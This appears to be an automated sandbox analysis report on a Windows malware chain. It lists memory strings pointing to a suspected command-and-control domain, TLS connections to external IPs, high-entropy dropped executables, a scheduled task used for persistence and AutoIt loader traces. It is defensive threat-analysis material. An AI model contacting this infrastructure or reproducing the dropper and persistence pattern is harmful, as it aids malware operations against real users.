                            Source: AApUa7VQiy.exe, 00000000.00000003.1327817258.000000000144C000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1327618460.000000000144A000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1955876898.0000000005AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apiD
                            Source: ktIplF5.exe, 0000000F.00000003.2035595673.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2077041931.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apimA
                            Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apiow
                            Source: AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apisw
                            Source: ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/apitA
                            Source: AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/f
                            Source: AApUa7VQiy.exe, 00000000.00000003.1341672142.0000000005D7C000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1340842040.0000000005D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/iiI
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1353809567.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1462355882.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1383129075.0000000005D71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/ime
                            Source: ktIplF5.exe, 0000000F.00000003.2092408415.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000002.2108392817.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org/rj
                            Source: AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1382937606.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001433000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001433000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2045528163.0000000001246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warlikedbeliev.org:443/api
                            Source: ktIplF5.exe, 0000000F.00000003.1973189454.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1971970302.0000000005AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                            Source: Macromedia.com, 00000033.00000003.2233001765.00000000039AF000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                            Source: infinity.exe, 0000000A.00000002.2748200742.0000000002081000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831170949.0000000002081000.00000004.00001000.00020000.00000000.sdmp, infinity.exe, 0000000A.00000003.1831091705.0000000002380000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2756011538.0000000000792000.00000004.00000020.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000003.1832903310.0000000002198000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000003.1832825175.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, infinity.tmp, 0000000B.00000002.2762554326.0000000002198000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: Macromedia.com, 00000033.00000002.2765461914.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                            Source: AApUa7VQiy.exe, 00000000.00000003.1328782162.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1924188086.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925261207.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1923621422.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                            Source: AApUa7VQiy.exe, 00000000.00000003.1368365608.0000000005D71000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1959045074.0000000005AEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                            Source: AApUa7VQiy.exe, 00000000.00000003.1355170367.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: AApUa7VQiy.exe, 00000000.00000003.1355170367.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1958512091.0000000005E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: df1b740bf8.exe, 0000001E.00000003.2056607045.0000000001349000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000003.2057116652.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                            Source: df1b740bf8.exe, 0000001E.00000003.2056711677.0000000001306000.00000004.00000020.00020000.00000000.sdmp, df1b740bf8.exe, 0000001E.00000002.2077910208.0000000001306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53476 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53608
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53482 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53564
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53485
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53646
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53669 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53646 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53533 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53579 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53473 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53546 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53632 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53542 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53538
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53592 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53653
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53511 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53650
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53657
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53579
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53533
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53666 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53635 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53469 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53465 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53673 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53564 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53548
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53650 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53669
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53478 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53621 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53465
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53542
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53663
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53663 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53469
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53502
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53546
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53622
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53666
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53621
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53502 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53473
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53550
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53671
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53471 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53471
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53592
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53630 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53653 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53548 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53638 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53657 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53481 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53638
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53538 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53622 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53485 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53675
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53476
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53597
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53630
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53673
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53474
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53635
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53511
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53478
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53632
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53482
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53474 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53481
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53597 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53671 -> 443
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49707 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49710 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49719 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49727 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49742 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.11:53465 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53469 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53471 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53473 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53474 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53476 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53478 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:53481 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53482 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53485 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.11:53502 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53608 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53622 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53638 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53650 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53653 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53657 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53663 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53666 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53669 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53671 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53673 version: TLS 1.2

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe entropy: 7.99815839126Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe entropy: 7.99815839126Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\infinity[1].exe entropy: 7.99812251416Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe entropy: 7.99812251416Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Comics entropy: 7.99757886329Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Japanese entropy: 7.99686012246Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Put entropy: 7.9976114418Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Arbitration entropy: 7.99727723824Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Characterized entropy: 7.99711087268Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Entries entropy: 7.99722969418Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Users\user\AppData\Local\Temp\Geographic entropy: 7.99870329299Jump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\36469\L entropy: 7.99955700326Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Users\user\AppData\Local\Temp\Hills entropy: 7.99438989644Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Users\user\AppData\Local\Temp\Soundtrack entropy: 7.99781086698Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Users\user\AppData\Local\Temp\Plumbing entropy: 7.99709677072Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Users\user\AppData\Local\Temp\Complement entropy: 7.99710096126Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Users\user\AppData\Local\Temp\Fm entropy: 7.99863955856Jump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\764661\F entropy: 7.99919046719Jump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comFile created: C:\Users\user\AppData\Local\GuardTech Solutions\r entropy: 7.99919046719Jump to dropped file

                            System Summary

                            barindex
                            Source: random[3].exe.9.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e807faf5-a
                            Source: random[3].exe.9.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9d5e8b32-3
                            Source: AApUa7VQiy.exeStatic PE information: section name:
                            Source: AApUa7VQiy.exeStatic PE information: section name: .idata
                            Source: AApUa7VQiy.exeStatic PE information: section name:
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name:
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name: .idata
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: section name:
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name:
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: section name: .idata
                            Source: skotes.exe.6.drStatic PE information: section name:
                            Source: skotes.exe.6.drStatic PE information: section name: .idata
                            Source: random[2].exe.9.drStatic PE information: section name:
                            Source: random[2].exe.9.drStatic PE information: section name: .idata
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name:
                            Source: 62950fb3a8.exe.9.drStatic PE information: section name: .idata
                            Source: random[4].exe.9.drStatic PE information: section name:
                            Source: random[4].exe.9.drStatic PE information: section name: .idata
                            Source: random[4].exe.9.drStatic PE information: section name:
                            Source: 072d564b60.exe.9.drStatic PE information: section name:
                            Source: 072d564b60.exe.9.drStatic PE information: section name: .idata
                            Source: 072d564b60.exe.9.drStatic PE information: section name:
                            Source: random[3].exe0.9.drStatic PE information: section name:
                            Source: random[3].exe0.9.drStatic PE information: section name: .idata
                            Source: random[3].exe0.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: .idata
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name: .idata
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: .idata
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name: .idata
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: .idata
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: flv2aviconverter24.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Flv2AVIConverter.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\DpInvestigated
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\PromotionalToken
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\PropeciaJoan
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\WestCornell
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\SchedulesAb
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\ContainsBefore
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\TokenDetroit
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\AttacksContacted
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B478BB6_2_00B478BB
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B488606_2_00B48860
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B470496_2_00B47049
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B431A86_2_00B431A8
